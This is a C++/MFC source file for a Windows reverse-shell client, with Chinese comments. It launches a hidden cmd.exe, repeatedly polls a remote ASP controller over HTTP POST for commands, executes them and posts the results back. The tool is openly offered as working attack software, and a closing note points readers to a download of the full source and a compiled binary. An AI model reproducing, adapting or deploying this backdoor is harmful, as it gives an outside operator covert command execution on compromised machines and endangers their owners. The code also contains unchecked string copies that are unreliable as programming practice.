// shell.cpp : Defines the entry point for the console application.
//
// 实现功能: 与ASP控制端实现交互，实现反向连接
//

#include "stdafx.h"
#include "shell.h"
#include "afxinet.h"

#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif

#define BUFFER_SIZE 1024 // 读缓冲区大小
/////////////////////////////////////////////////////////////////////////////
// The one and only application object

CWinApp theApp;

using namespace std;

CString URLEncode(const char* s); // URL 编码函数
BOOL PostRequest(const char *szFormData, char *szResult); // 向控制端发送请求函数
void DoShell(); // 与cmd.exe进行交互函数
char szServer[50], szPath[50]; // 公用变量

int _tmain(int argc, TCHAR* argv[], TCHAR* envp[])
{
 int nRetCode = 0;

 // initialize MFC and print and error on failure
 if (!AfxWinInit(::GetModuleHandle(NULL), NULL, ::GetCommandLine(), 0))
 {
 // TODO: change error code to suit your needs
 cerr << _T("Fatal Error: MFC initialization failed") << endl;
 nRetCode = 1;
 }
 printf("ASP Console Client By CoolDiyer\n");
 if (argc == 3)
 {
 memset(szServer, 0, sizeof(szServer));
 memset(szPath, 0, sizeof(szPath));
 strcpy(szServer, argv[1]);
 strcpy(szPath, argv[2]);
 }
 else
 {
 printf("Usage:\n\trshell <Server> <Path>\nExp.\n\trshell www.abc.com /x.asp\n");
 return -1;
 }
 char szResult[1024];
 PostRequest("act=login", szResult); //登录
 DoShell(); // 执行与cmd.exe的交互
 PostRequest("act=exit", szResult); //退出
 return nRetCode;
}

//
// URL编码函数,返回一个CString变量
//

CString URLEncode(const char* s)
{
 CString encoded = "";
 int len = strlen(s);
 char* buf = new char[16]; // way longer than needed
 unsigned char c;
 
 for(int i=0; i < len; i++)
 {
 c = s[i];
 if ((c >= 'A' && c <= 'Z') || (c >= 'a' && c <= 'z') ||
 (c >= '0' && c <= '9') || c == '.' || c == '-' || c == '_')
 {
 sprintf(buf, "%c", c);
 encoded += buf;
 continue;
 }
 if(c == ' ')
 {
 sprintf(buf, "%c", '+');
 encoded += buf;
 continue;
 }
 sprintf(buf, "%.2X", c);
 encoded += "%";
 encoded += buf;
 }

 delete[] buf;
 return encoded;
}

//
// 表单发送函数，核心例程,返回接收到的内容，也就是要执行的命令
//

BOOL PostRequest(const char *szFormData, char *szResult)
{
 unsigned int uRetry = 3; //重试三次
 try{
loop:
 CInternetSession session;
 CHttpConnection *pConnection = session.GetHttpConnection(szServer);
 CHttpFile *pFile = pConnection->OpenRequest(CHttpConnection::HTTP_VERB_POST, szPath);
 // AddRequestHeaders是必要的
 pFile->AddRequestHeaders("Content-Type: application/x-www-form-urlencoded");
 CString szData;

 if (pFile -> SendRequest(NULL,0,(LPVOID) szFormData, strlen(szFormData)+1))
 {
 while(pFile->ReadString(szData))
 {
 if (szResult != NULL)
 strcpy(szResult, szData.GetBuffer(0));
 }
 pFile->Close();
 }
 session.Close();
 }
 catch(...){
 if (uRetry --)
 goto loop;
 }
 return TRUE;
}

//
// 让cmd.exe与ASP控制端进行交互的核心例程
//

void DoShell()
{
 int ret;

 SECURITY_ATTRIBUTES sa;
 
 sa.nLength = sizeof( sa );
 sa.lpSecurityDescriptor = 0;
 sa.bInheritHandle = TRUE;
 
 HANDLE hReadPipe1, hWritePipe1, hReadPipe2, hWritePipe2;

 ret=CreatePipe(&hReadPipe1, &hWritePipe1, &sa, 0);
 ret=CreatePipe(&hReadPipe2, &hWritePipe2, &sa, 0);
 
 STARTUPINFO si;
 ZeroMemory(&si, sizeof(si));

 GetStartupInfo(&si);
 
 si.cb = sizeof(si);
 si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
 si.wShowWindow = SW_HIDE;
 si.hStdInput = hReadPipe2;
 si.hStdOutput = si.hStdError = hWritePipe1;
 
 PROCESS_INFORMATION processInfo;
 
 char cmdLine[] = "cmd.exe";

 ZeroMemory(&processInfo, sizeof(PROCESS_INFORMATION));
 ret = CreateProcess(NULL, cmdLine, NULL, NULL, 1, 0, NULL, NULL, &si, &processInfo);
 
 char buff[BUFFER_SIZE] = { 0 };
 char szTmp[BUFFER_SIZE*3]; // 因为要把结果进行编码，所以缓冲区相对要大
 unsigned long bytesRead = 0;
 int i = 0;

 while (TRUE)
 {
 memset(buff, 0, BUFFER_SIZE);
 ret = PeekNamedPipe(hReadPipe1, buff, BUFFER_SIZE, &bytesRead, 0, 0);
 
 for (i = 0; i < 5 && bytesRead == 0; i++)
 {
 Sleep(100);
 ret = PeekNamedPipe(hReadPipe1, buff, BUFFER_SIZE, &bytesRead, NULL, NULL);
 }
 
 if (bytesRead)
 {
 ret = ReadFile( hReadPipe1, buff, bytesRead, &bytesRead, 0 );
 if (!ret) break;
 memset(szTmp, 0, sizeof(szTmp));
 strcpy(szTmp, "result=");
 strcat(szTmp, URLEncode(buff).GetBuffer(0));
 printf("%s", szTmp);
 PostRequest(szTmp, NULL); // 发送命令执行结果
 printf("Post command result ok\n");
 }
 else
 {
 // 得到要执行的命令
 do
 {
 PostRequest("get=yes", buff);
 printf("get command\n");
 ::Sleep(1000); // 间隔为1秒
 }
 while (strlen(buff) <= 0);
 printf("%s\n", buff);
 // 命令为exit则退出
 if (strcmp(buff, "exit") == 0) break; // 程序退出

 strcat(buff, "\n"); // 加上换行
 bytesRead = strlen(buff);
 printf("execute command %s", buff);
 // 执行命令
 WriteFile( hWritePipe2, buff, bytesRead, &bytesRead, 0);
 }
 }

 TerminateProcess(processInfo.hProcess, 0);

 CloseHandle(hReadPipe1);
 CloseHandle(hReadPipe2);
 CloseHandle(hWritePipe1);
 CloseHandle(hWritePipe2);
}

备注:
以上代码可能因过滤而显示错误，请下载压缩包(含全部源代码和编译好的程序):aspconsole